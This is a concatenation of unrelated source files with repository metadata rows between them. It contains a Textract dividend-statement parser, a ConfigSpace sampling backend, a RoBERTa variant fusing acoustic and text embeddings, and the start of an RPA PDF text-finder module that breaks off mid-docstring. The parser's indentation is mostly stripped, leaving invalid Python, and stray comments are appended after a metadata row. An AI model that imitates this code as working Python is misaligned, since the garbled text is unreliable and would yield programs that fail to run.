"Apache-2.0"
] | null | null | null | src/getContents.py | ajayz09/amazon-textract | bea3028596d6b60482017e12b80cbb0d2b91d3a5 | [
"Apache-2.0"
] | null | null | null | import os
import pandas as pd
def formatdate(paymentDate):
    months = dict(january='01', february='02', march='03', april='04',
                  may='05', june='06', july='07', august='08', september='09',
                  october='10', november='11', december='12')
    paymentDateList = paymentDate.split()
    if len(paymentDateList) != 1:
        # Dates of the form '15 March 2018'
        day = paymentDateList[0]
        month = months[paymentDateList[1].lower()]
        year = paymentDateList[2]
    else:
        # Dates of the form '15/03/2018'
        paymentDateList = paymentDate.split('/')
        day = paymentDateList[0]
        month = paymentDateList[1]
        year = paymentDateList[2]
    return year + '-' + month + '-' + day
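# Worked examples (follow directly from the two branches above):
#   formatdate('15 March 2018') -> '2018-03-15'
#   formatdate('15/03/2018')    -> '2018-03-15'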
def getFrankedAmount(df):
DICTIONARY_FA = "../dictionary/franked-amount"
temp = open(DICTIONARY_FA,'r').read().split('\n')
try:
for i in temp:
frankedAmountRow = df[df['Key'].str.match(i)]
if not frankedAmountRow.empty:
frankedAmount = frankedAmountRow.Value.values[0]
frankedAmount = frankedAmount.replace("A$","")
frankedAmount = frankedAmount.replace("$","")
print('Franked Amount - ',frankedAmount)
return frankedAmount
    except Exception:
return False
def getUnfrankedAmount(df):
DICTIONARY_UFA = "../dictionary/unfranked-amount"
temp = open(DICTIONARY_UFA,'r').read().split('\n')
try:
for i in temp:
unfrankedAmountRow = df[df['Key'].str.match(i)]
if not unfrankedAmountRow.empty:
unfrankedAmount = unfrankedAmountRow.Value.values[0]
unfrankedAmount = unfrankedAmount.replace("A$","")
unfrankedAmount = unfrankedAmount.replace("$","")
if unfrankedAmount == 'Nil':
unfrankedAmount = 0.00
print('Unfranked Amount - ',unfrankedAmount)
return True
    except Exception:
return False
def getParticipatingShares(df):
DICTIONARY_PS = "../dictionary/participating-shares"
temp = open(DICTIONARY_PS,'r').read().split('\n')
try:
for i in temp:
participatingSharesRow = df[df['Key'].str.match(i)]
if not participatingSharesRow.empty:
participatingShares = participatingSharesRow.Value.values[0]
participatingShares = participatingShares.replace(",","")
print('Participating Shares - ',participatingShares)
return True
    except Exception:
return False
def getTotalPayment(df):
DICTIONARY_TP = "../dictionary/total-payment"
temp = open(DICTIONARY_TP,'r').read().split('\n')
try:
for i in temp:
totalPaymentRow = df[df['Key'].str.match(i)]
if not totalPaymentRow.empty:
totalPayment = totalPaymentRow.Value.values[0]
totalPayment = totalPayment.replace("A$","")
totalPayment = totalPayment.replace("$","")
print('Total Payment - ',totalPayment)
return True
    except Exception:
return False
def getFrankingCredit(df):
DICTIONARY_FC = "../dictionary/franking-credits"
temp = open(DICTIONARY_FC,'r').read().split('\n')
try:
for i in temp:
frankedCreditRow = df[df['Key'].str.match(i)]
if not frankedCreditRow.empty:
frankedCredit = frankedCreditRow.Value.values[0]
frankedCredit = frankedCredit.replace("A$","")
frankedCredit = frankedCredit.replace("$","")
print('Franking Credit - ',frankedCredit)
return True
    except Exception:
return False
def getPaymentDate(df):
DICTIONARY_PD = "../dictionary/payment-date"
temp = open(DICTIONARY_PD,'r').read().split('\n')
try:
for i in temp:
paymentDateRow = df[df['Key'].str.match(i)]
if not paymentDateRow.empty:
paymentDate = paymentDateRow.Value.values[0]
if not paymentDate:
return False
date = formatdate(paymentDate)
print('Payment Date - ',date)
return True
    except Exception:
return False
def getFrankingCreditsFromTable(df):
DICTIONARY_FC = "../dictionary/franking-credits"
temp = open(DICTIONARY_FC,'r').read().split('\n')
try:
for i in temp:
# print("df.columns ",df.columns)
if i in df.columns:
frankedCredit = df[i].iloc[0]
frankedCredit = frankedCredit.replace("A$","")
frankedCredit = frankedCredit.replace("$","")
print('Franking Credit - ',frankedCredit)
return True
    except Exception:
return False
def getFrankedAmountFromTable(df):
DICTIONARY_FA = "../dictionary/franked-amount"
temp = open(DICTIONARY_FA,'r').read().split('\n')
try:
for i in temp:
if i in df.columns:
frankedAmount = df[i].iloc[0]
frankedAmount = frankedAmount.replace("A$","")
frankedAmount = frankedAmount.replace("$","")
print('Franked Amount - ',frankedAmount)
return frankedAmount
    except Exception:
return False
def getUnfrankedAmountFromTable(df):
DICTIONARY_UFA = "../dictionary/unfranked-amount"
temp = open(DICTIONARY_UFA,'r').read().split('\n')
try:
for i in temp:
if i in df.columns:
unfrankedAmount = df[i].iloc[0]
unfrankedAmount = unfrankedAmount.replace("A$","")
unfrankedAmount = unfrankedAmount.replace("$","")
if unfrankedAmount == 'Nil':
unfrankedAmount = 0.00
print('Unfranked Amount - ',unfrankedAmount)
return True
    except Exception:
return False
def getTotalPaymentFromTable(df):
DICTIONARY_TP = "../dictionary/total-payment"
temp = open(DICTIONARY_TP,'r').read().split('\n')
try:
for i in temp:
if i in df.columns:
totalPayment = df[i].iloc[0]
totalPayment = totalPayment.replace("A$","")
totalPayment = totalPayment.replace("$","")
print('Total Payment - ',totalPayment)
return True
    except Exception:
return False
def getParticipatingSharesFromTable(df):
DICTIONARY_PS = "../dictionary/participating-shares"
temp = open(DICTIONARY_PS,'r').read().split('\n')
try:
for i in temp:
if i in df.columns:
participatingShares = df[i].iloc[0]
participatingShares = participatingShares.replace("A$","")
participatingShares = participatingShares.replace("$","")
print('Participating Shares - ',participatingShares)
return True
    except Exception:
return False
def getPaymentDateFromText(textDocument):
DICTIONARY_PD = "../dictionary/payment-date"
temp = open(DICTIONARY_PD,'r').read().split('\n')
flag = False
for line in open(textDocument):
if flag == True:
date = formatdate(line)
if date:
print ('Payment Date - ',date)
return True
for k in temp:
if k in line:
flag = True
return False
DOCUMENTS_PATH = "../results"
dividendDF = pd.DataFrame(columns=['Number of Securities','Franked Amount','Unfranked Amount','Total Payment','Franking Credit'],index = None)
gotFrankedAmount = False
gotUnfrankedAmount = False
gotParticipatingShares = False
gotTotalPayment = False
gotFrankingCredits = False
gotPaymentDate = False
for documents in os.listdir(DOCUMENTS_PATH):
print("\nContents of document - ", documents)
print("----------------------------")
FORM_DATA_PATH = DOCUMENTS_PATH + '/' + documents + '/Forms/'
for forms in os.listdir(FORM_DATA_PATH):
FORM_DATA = FORM_DATA_PATH + forms
data = pd.read_csv(FORM_DATA)
gotFrankedAmount = getFrankedAmount(data)
gotUnfrankedAmount = getUnfrankedAmount(data)
gotParticipatingShares = getParticipatingShares(data)
gotTotalPayment = getTotalPayment(data)
gotFrankingCredits = getFrankingCredit(data)
gotPaymentDate = getPaymentDate(data)
TABLE_DATA_PATH = DOCUMENTS_PATH + '/' + documents + '/Tables/'
for tables in os.listdir(TABLE_DATA_PATH):
TABLE_DATA = TABLE_DATA_PATH + tables
dataTable = pd.read_csv(TABLE_DATA,skiprows=1,index_col=False)
if not gotFrankingCredits:
gotFrankingCredits = getFrankingCreditsFromTable(dataTable)
if not gotFrankedAmount:
gotFrankedAmount = getFrankedAmountFromTable(dataTable)
if not gotUnfrankedAmount:
gotUnfrankedAmount = getUnfrankedAmountFromTable(dataTable)
if not gotTotalPayment:
gotTotalPayment = getTotalPaymentFromTable(dataTable)
if not gotParticipatingShares:
gotParticipatingShares = getParticipatingSharesFromTable(dataTable)
TEXT_DATA_PATH = DOCUMENTS_PATH + '/' + documents + '/Text/'
for text in os.listdir(TEXT_DATA_PATH):
TEXT_DATA = TEXT_DATA_PATH + text
if not gotPaymentDate:
gotPaymentDate = getPaymentDateFromText(TEXT_DATA)
if gotFrankedAmount:
if not gotFrankingCredits:
frankingCredit = (float(gotFrankedAmount) / 0.7) - float(gotFrankedAmount)
print('Franking Credit - ',(round(frankingCredit, 2))) | 38.206897 | 175 | 0.586843 | 920 | 9,972 | 6.3 | 0.166304 | 0.008282 | 0.037267 | 0.022774 | 0.504658 | 0.478088 | 0.441511 | 0.43668 | 0.414941 | 0.412698 | 0 | 0.007577 | 0.298536 | 9,972 | 261 | 176 | 38.206897 | 0.821015 | 0.018853 | 0 | 0.556034 | 0 | 0 | 0.088575 | 0.038662 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056034 | false | 0 | 0.017241 | 0 | 0.189655 | 0.064655 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
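# Worked example of the gross-up above: a fully franked amount of 70.00 at the
# 30% company tax rate yields 70.00 / 0.7 - 70.00 = 30.00 in franking credits.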
375e6389f147aa8b980167ffea1afe5678abb33e | 4,203 | py | Python | sspace/backends/cspace.py | Epistimio/sample-space | 5435b7f97a5c9dea279271033fd4582dbd77211f | [
"BSD-3-Clause"
] | null | null | null | sspace/backends/cspace.py | Epistimio/sample-space | 5435b7f97a5c9dea279271033fd4582dbd77211f | [
"BSD-3-Clause"
] | 6 | 2020-05-23T02:16:40.000Z | 2022-03-16T01:37:45.000Z | sspace/backends/cspace.py | Epistimio/sample-space | 5435b7f97a5c9dea279271033fd4582dbd77211f | [
"BSD-3-Clause"
] | null | null | null | import_error = None
try:
import ConfigSpace as cs
import ConfigSpace.hyperparameters as csh
from sspace.utils import sort_dict
cond_dispatch_leaves = {
'eq': cs.EqualsCondition,
'ne': cs.NotEqualsCondition,
'lt': cs.LessThanCondition,
'gt': cs.GreaterThanCondition,
'in': cs.InCondition
}
forbid_dispatch_leaves = {
'eq': cs.ForbiddenEqualsClause,
'in': cs.ForbiddenInClause,
}
cond_dispatch_nodes = {
'and': cs.AndConjunction,
'or': cs.OrConjunction,
}
forbid_dispatch_nodes = {
'and': cs.ForbiddenAndConjunction
}
def categorical(name, options):
return csh.CategoricalHyperparameter(
name,
choices=list(options.keys()),
weights=list(options.values()))
def uniform(quantization, discrete=False, **kwargs):
if discrete:
return csh.UniformIntegerHyperparameter(q=quantization, **kwargs)
return csh.UniformFloatHyperparameter(q=quantization, **kwargs)
def normal(quantization, loc, scale, discrete=False, **kwargs):
if discrete:
return csh.NormalIntegerHyperparameter(mu=loc, sigma=scale, q=quantization, **kwargs)
return csh.NormalFloatHyperparameter(mu=loc, sigma=scale, q=quantization, **kwargs)
dim_leaves = {
'uniform': uniform,
'normal': normal,
'categorical': categorical,
'ordinal': csh.OrdinalHyperparameter
}
except ImportError as e:
import_error = e
class _ConfigSpaceBuilder:
def __init__(self):
if import_error:
raise import_error
def cond_leaf(self, mode, leaf, hyper_parameter, ctx=None):
fun = None
if mode == 'conditionals':
fun = cond_dispatch_leaves.get(leaf.name)
elif mode == 'forbid':
fun = forbid_dispatch_leaves.get(leaf.name)
if fun is None:
raise NotImplementedError(f'{leaf.name} is missing')
if mode == 'conditionals':
name = leaf.expression
if not isinstance(name, str):
name = name.name
expr = ctx.get(name)
return fun(hyper_parameter, expr, leaf.value)
return fun(hyper_parameter, leaf.value)
def cond_node(self, mode, node, hyper_parameter, ctx=None):
fun = None
if mode == 'conditionals':
fun = cond_dispatch_nodes.get(node.name)
elif mode == 'forbid':
fun = forbid_dispatch_nodes.get(node.name)
if fun is None:
raise NotImplementedError(f'{node.name} is missing')
lhs = node.lhs.visit(self, mode, hyper_parameter, ctx)
rhs = node.rhs.visit(self, mode, hyper_parameter, ctx)
return fun(lhs, rhs)
def dim_leaf(self, fun_name, **kwargs):
fun = dim_leaves.get(fun_name)
if fun is None:
raise NotImplementedError(f'{fun_name} is missing')
return fun(**kwargs)
def dim_node(self, node, **kwargs):
space = cs.ConfigurationSpace()
ctx = {}
for k, hp_expr in node.space_tree.items():
new_hp = hp_expr.visit(self, **kwargs)
if isinstance(new_hp, cs.ConfigurationSpace):
space.add_configuration_space(
prefix=hp_expr.name,
delimiter='.',
configuration_space=new_hp)
else:
space.add_hyperparameter(new_hp)
ctx[k] = new_hp
if hp_expr.condition is not None:
cond = hp_expr.condition.visit(self, 'conditionals', new_hp, ctx)
space.add_condition(cond)
if hp_expr.forbidden is not None:
forbid = hp_expr.forbidden.visit(self, 'forbid', new_hp)
space.add_forbidden_clause(forbid)
return space
@staticmethod
def sample(handle, n_samples, seed):
handle.seed(seed)
samples = handle.sample_configuration(n_samples)
if isinstance(samples, list):
return [sort_dict(c.get_dictionary()) for c in samples]
return [sort_dict(samples.get_dictionary())]
| 28.787671 | 97 | 0.600999 | 457 | 4,203 | 5.374179 | 0.266958 | 0.017101 | 0.030945 | 0.013436 | 0.245521 | 0.210098 | 0.185668 | 0.098534 | 0.049674 | 0.049674 | 0 | 0 | 0.29931 | 4,203 | 145 | 98 | 28.986207 | 0.833956 | 0 | 0 | 0.113208 | 0 | 0 | 0.044016 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.084906 | false | 0 | 0.075472 | 0.009434 | 0.283019 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3761ad381b725114e1ca90dc5552b488a21daeb4 | 16,128 | py | Python | models/roberta.py | tjdevWorks/multimodal-sentiment-prediction | cc656817f12e9676f59dd66c134a365bad8cbcec | [
"Apache-2.0"
] | 8 | 2022-02-04T20:37:26.000Z | 2022-03-30T03:18:04.000Z | models/roberta.py | tjdevWorks/multimodal-sentiment-prediction | cc656817f12e9676f59dd66c134a365bad8cbcec | [
"Apache-2.0"
] | 1 | 2022-02-13T22:44:30.000Z | 2022-02-13T23:15:34.000Z | models/roberta.py | tjdevWorks/TEASEL | cc656817f12e9676f59dd66c134a365bad8cbcec | [
"Apache-2.0"
] | null | null | null | from transformers import RobertaPreTrainedModel
from transformers.models.roberta.modeling_roberta import RobertaEmbeddings, RobertaEncoder, RobertaPooler, RobertaLMHead, RobertaClassificationHead
from transformers.modeling_outputs import BaseModelOutputWithPoolingAndCrossAttentions, MaskedLMOutput, SequenceClassifierOutput
from transformers.utils import logging
import torch
logger = logging.get_logger()
class RobertaTEASEL(RobertaPreTrainedModel):
"""
The model can behave as an encoder (with only self-attention) as well as a decoder, in which case a layer of
cross-attention is added between the self-attention layers, following the architecture described in `Attention is
all you need`_ by Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N. Gomez, Lukasz
Kaiser and Illia Polosukhin.
To behave as an decoder the model needs to be initialized with the :obj:`is_decoder` argument of the configuration
set to :obj:`True`. To be used in a Seq2Seq model, the model needs to initialized with both :obj:`is_decoder`
argument and :obj:`add_cross_attention` set to :obj:`True`; an :obj:`encoder_hidden_states` is then expected as an
input to the forward pass.
.. _`Attention is all you need`: https://arxiv.org/abs/1706.03762
"""
_keys_to_ignore_on_load_missing = [r"position_ids"]
# Copied from transformers.models.bert.modeling_bert.BertModel.__init__ with Bert->Roberta
def __init__(self, config, add_pooling_layer=True):
super().__init__(config)
self.config = config
self.embeddings = RobertaEmbeddings(config)
self.encoder = RobertaEncoder(config)
self.pooler = RobertaPooler(config) if add_pooling_layer else None
self.init_weights()
def get_input_embeddings(self):
return self.embeddings.word_embeddings
def set_input_embeddings(self, value):
self.embeddings.word_embeddings = value
def _prune_heads(self, heads_to_prune):
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
class PreTrainedModel
"""
for layer, heads in heads_to_prune.items():
self.encoder.layer[layer].attention.prune_heads(heads)
# Copied from transformers.models.bert.modeling_bert.BertModel.forward
def forward(
self,
acoustic_embedding,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
past_key_values=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
encoder_hidden_states (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`):
Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention if
the model is configured as a decoder.
encoder_attention_mask (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Mask to avoid performing attention on the padding token indices of the encoder input. This mask is used in
the cross-attention if the model is configured as a decoder. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
past_key_values (:obj:`tuple(tuple(torch.FloatTensor))` of length :obj:`config.n_layers` with each tuple having 4 tensors of shape :obj:`(batch_size, num_heads, sequence_length - 1, embed_size_per_head)`):
Contains precomputed key and value hidden states of the attention blocks. Can be used to speed up decoding.
If :obj:`past_key_values` are used, the user can optionally input only the last :obj:`decoder_input_ids`
(those that don't have their past key value states given to this model) of shape :obj:`(batch_size, 1)`
instead of all :obj:`decoder_input_ids` of shape :obj:`(batch_size, sequence_length)`.
use_cache (:obj:`bool`, `optional`):
If set to :obj:`True`, :obj:`past_key_values` key value states are returned and can be used to speed up
decoding (see :obj:`past_key_values`).
"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if self.config.is_decoder:
use_cache = use_cache if use_cache is not None else self.config.use_cache
else:
use_cache = False
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
batch_size, seq_length = input_shape
device = input_ids.device if input_ids is not None else inputs_embeds.device
# past_key_values_length
past_key_values_length = past_key_values[0][0].shape[2] if past_key_values is not None else 0
if attention_mask is None:
            attention_mask = torch.ones((batch_size, seq_length + past_key_values_length), device=device)
if token_type_ids is None:
if hasattr(self.embeddings, "token_type_ids"):
buffered_token_type_ids = self.embeddings.token_type_ids[:, :seq_length]
buffered_token_type_ids_expanded = buffered_token_type_ids.expand(batch_size, seq_length)
token_type_ids = buffered_token_type_ids_expanded
else:
token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)
# We can provide a self-attention mask of dimensions [batch_size, from_seq_length, to_seq_length]
# ourselves in which case we just need to make it broadcastable to all heads.
extended_attention_mask: torch.Tensor = self.get_extended_attention_mask(attention_mask, input_shape, device)
# If a 2D or 3D attention mask is provided for the cross-attention
# we need to make broadcastable to [batch_size, num_heads, seq_length, seq_length]
if self.config.is_decoder and encoder_hidden_states is not None:
encoder_batch_size, encoder_sequence_length, _ = encoder_hidden_states.size()
encoder_hidden_shape = (encoder_batch_size, encoder_sequence_length)
if encoder_attention_mask is None:
encoder_attention_mask = torch.ones(encoder_hidden_shape, device=device)
encoder_extended_attention_mask = self.invert_attention_mask(encoder_attention_mask)
else:
encoder_extended_attention_mask = None
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)
embedding_output = self.embeddings(
input_ids=input_ids,
position_ids=position_ids,
token_type_ids=token_type_ids,
inputs_embeds=inputs_embeds,
past_key_values_length=past_key_values_length,
)
        # Create the fusion of the acoustic and text embedding outputs
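        # Hypothetical shapes for illustration: if embedding_output is
        # [batch, seq_len, hidden] and acoustic_embedding is
        # [batch, acoustic_len, hidden], the fused sequence is
        # [batch, 1 + acoustic_len + (seq_len - 1), hidden]: the acoustic
        # tokens are spliced in right after the <s> (CLS) token, so any
        # attention_mask supplied by the caller must cover the fused length.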
fusion_embedding = torch.concat((torch.unsqueeze(embedding_output[:,0,:],1), acoustic_embedding, embedding_output[:,1:,:]),1)
encoder_outputs = self.encoder(
fusion_embedding,
attention_mask=extended_attention_mask,
head_mask=head_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_extended_attention_mask,
past_key_values=past_key_values,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = encoder_outputs[0]
pooled_output = self.pooler(sequence_output) if self.pooler is not None else None
if not return_dict:
return (sequence_output, pooled_output) + encoder_outputs[1:]
return BaseModelOutputWithPoolingAndCrossAttentions(
last_hidden_state=sequence_output,
pooler_output=pooled_output,
past_key_values=encoder_outputs.past_key_values,
hidden_states=encoder_outputs.hidden_states,
attentions=encoder_outputs.attentions,
cross_attentions=encoder_outputs.cross_attentions,
)
class RobertaForMaskedLM_Teasel(RobertaPreTrainedModel):
_keys_to_ignore_on_save = [r"lm_head.decoder.weight", r"lm_head.decoder.bias"]
_keys_to_ignore_on_load_missing = [r"position_ids", r"lm_head.decoder.weight", r"lm_head.decoder.bias"]
_keys_to_ignore_on_load_unexpected = [r"pooler"]
def __init__(self, config):
super().__init__(config)
if config.is_decoder:
logger.warning(
"If you want to use `RobertaForMaskedLM` make sure `config.is_decoder=False` for "
"bi-directional self-attention."
)
self.roberta = RobertaTEASEL(config, add_pooling_layer=False)
self.lm_head = RobertaLMHead(config)
# The LM head weights require special treatment only when they are tied with the word embeddings
self.update_keys_to_ignore(config, ["lm_head.decoder.weight"])
self.init_weights()
def get_output_embeddings(self):
return self.lm_head.decoder
def set_output_embeddings(self, new_embeddings):
self.lm_head.decoder = new_embeddings
def forward(
self,
acoustic_embedding,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Labels for computing the masked language modeling loss. Indices should be in ``[-100, 0, ...,
config.vocab_size]`` (see ``input_ids`` docstring) Tokens with indices set to ``-100`` are ignored
(masked), the loss is only computed for the tokens with labels in ``[0, ..., config.vocab_size]``
kwargs (:obj:`Dict[str, any]`, optional, defaults to `{}`):
Used to hide legacy arguments that have been deprecated.
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.roberta(
acoustic_embedding,
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = outputs[0]
prediction_scores = self.lm_head(sequence_output)
masked_lm_loss = None
if labels is not None:
loss_fct = torch.nn.CrossEntropyLoss()
masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1))
if not return_dict:
output = (prediction_scores,) + outputs[2:]
return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output
return MaskedLMOutput(
loss=masked_lm_loss,
logits=prediction_scores,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
class RobertaForSequenceClassification(RobertaPreTrainedModel):
_keys_to_ignore_on_load_missing = [r"position_ids"]
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.config = config
self.roberta = RobertaTEASEL(config, add_pooling_layer=False)
self.classifier = RobertaClassificationHead(config)
self.init_weights()
def forward(
self,
acoustic_embedding,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`):
Labels for computing the sequence classification/regression loss. Indices should be in :obj:`[0, ...,
config.num_labels - 1]`. If :obj:`config.num_labels == 1` a regression loss is computed (Mean-Square loss),
If :obj:`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.roberta(
acoustic_embedding,
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = outputs[0]
logits = self.classifier(sequence_output)
loss = None
if labels is not None:
if self.config.problem_type is None:
if self.num_labels == 1:
self.config.problem_type = "regression"
elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int):
self.config.problem_type = "single_label_classification"
else:
self.config.problem_type = "multi_label_classification"
if self.config.problem_type == "regression":
loss_fct = torch.nn.MSELoss()
if self.num_labels == 1:
loss = loss_fct(logits.squeeze(), labels.squeeze())
else:
loss = loss_fct(logits, labels)
elif self.config.problem_type == "single_label_classification":
loss_fct = torch.nn.CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
elif self.config.problem_type == "multi_label_classification":
loss_fct = torch.nn.BCEWithLogitsLoss()
loss = loss_fct(logits, labels)
if not return_dict:
output = (logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return SequenceClassifierOutput(
loss=loss,
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
| 44.8 | 213 | 0.667783 | 2,018 | 16,128 | 5.061447 | 0.153617 | 0.036421 | 0.021147 | 0.014 | 0.418837 | 0.334737 | 0.31868 | 0.255042 | 0.217838 | 0.198159 | 0 | 0.004591 | 0.257254 | 16,128 | 359 | 214 | 44.924791 | 0.848067 | 0.264447 | 0 | 0.471545 | 0 | 0 | 0.045072 | 0.017108 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044715 | false | 0 | 0.020325 | 0.00813 | 0.130081 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3762cff1ab3661bebf0065d7a9d2efca756c6d5d | 14,847 | py | Python | packages/pdf/src/RPA/PDF/keywords/finder.py | AntonStange/rpaframework | 2a6a4abe56c7fece4f9cfed1ba488774393abdd8 | [
"Apache-2.0"
] | 25 | 2020-03-30T09:01:11.000Z | 2020-05-21T04:04:58.000Z | packages/pdf/src/RPA/PDF/keywords/finder.py | AntonStange/rpaframework | 2a6a4abe56c7fece4f9cfed1ba488774393abdd8 | [
"Apache-2.0"
] | 2 | 2020-04-02T18:08:58.000Z | 2020-05-27T12:07:19.000Z | packages/pdf/src/RPA/PDF/keywords/finder.py | AntonStange/rpaframework | 2a6a4abe56c7fece4f9cfed1ba488774393abdd8 | [
"Apache-2.0"
] | 7 | 2020-04-02T17:17:26.000Z | 2020-05-27T04:18:54.000Z | import functools
import math
import re
from dataclasses import dataclass
try:
# Python >=3.7
from re import Pattern
except ImportError:
# Python =3.6
from re import _pattern_type as Pattern
from typing import (
Callable,
Dict,
List,
Optional,
Union,
)
from RPA.PDF.keywords import (
LibraryContext,
keyword,
)
from RPA.PDF.keywords.model import BaseElement, TextBox
class TargetObject(BaseElement):
"""Container for Target text boxes with coordinates."""
    # Class-level attribute defaults.
boxid: int = -1
text: str = ""
Element = Union[TextBox, TargetObject]
@dataclass
class Match:
"""Match object returned by the `Find Text` keyword.
It contains the anchor point and its relative found elements in text format.
"""
anchor: str
direction: str
neighbours: List[str]
class FinderKeywords(LibraryContext):
"""Keywords for locating elements."""
def __init__(self, ctx):
super().__init__(ctx)
# Text locator might lead to multiple valid found anchors.
self._anchors: List[Element] = []
# The others usually have just one. (if multiple are found, set to it the
# first one)
self.anchor_element = None
def _get_candidate_search_function(
self, direction: str, regexp: Optional[Pattern], strict: bool
) -> Callable[[TextBox], bool]:
if direction in ["left", "right"]:
return functools.partial(
self._is_match_on_horizontal,
direction=direction,
regexp=regexp,
strict=strict,
)
if direction in ["top", "bottom", "up", "down"]:
return functools.partial(
self._is_match_on_vertical,
direction=direction,
regexp=regexp,
strict=strict,
)
if direction == "box":
return self._is_match_in_box
raise ValueError(f"Not recognized direction search {direction!r}")
def _log_element(self, elem: Element, prefix: str = ""):
template = f"{prefix} box %d | bbox %s | text %r"
self.logger.debug(template, elem.boxid, elem.bbox, elem.text)
@keyword
def find_text(
self,
locator: str,
pagenum: Union[int, str] = 1,
direction: str = "right",
closest_neighbours: Optional[Union[int, str]] = 1,
strict: bool = False,
regexp: str = None,
trim: bool = True,
) -> List[Match]:
"""Find the closest text elements near the set anchor(s) through `locator`.
The PDF will be parsed automatically before elements can be searched.
:param locator: Element to set anchor to. This can be prefixed with either
`text:`, `regex:` or `coords:` to find the anchor by text or coordinates.
`text` is assumed if no such prefix is specified. (text search is case
insensitive)
        :param pagenum: Page number on which the search is performed, defaults to 1
            (first page).
:param direction: In which direction to search for text elements. This can be
any of 'top'/'up', 'bottom'/'down', 'left' or 'right'. (defaults to
'right')
:param closest_neighbours: How many neighbours to return at most, sorted by the
distance from the current anchor.
        :param strict: Whether the element's margins should be used to match only
            those exactly aligned with the anchor. (turned off by default)
:param regexp: Expected format of the searched text value. By default all the
candidates in range are considered valid neighbours.
:param trim: Automatically trim leading/trailing whitespace from the text
elements. (switched on by default)
:returns: A list of `Match` objects where every match has the following
attributes: `.anchor` - the matched text with the locator; `.neighbours` -
            a list of adjacent texts found in the specified direction
**Examples**
**Robot Framework**
.. code-block:: robotframework
PDF Invoice Parsing
Open Pdf invoice.pdf
${matches} = Find Text Invoice Number
Log List ${matches}
.. code-block::
List has one item:
Match(anchor='Invoice Number', direction='right', neighbours=['INV-3337'])
**Python**
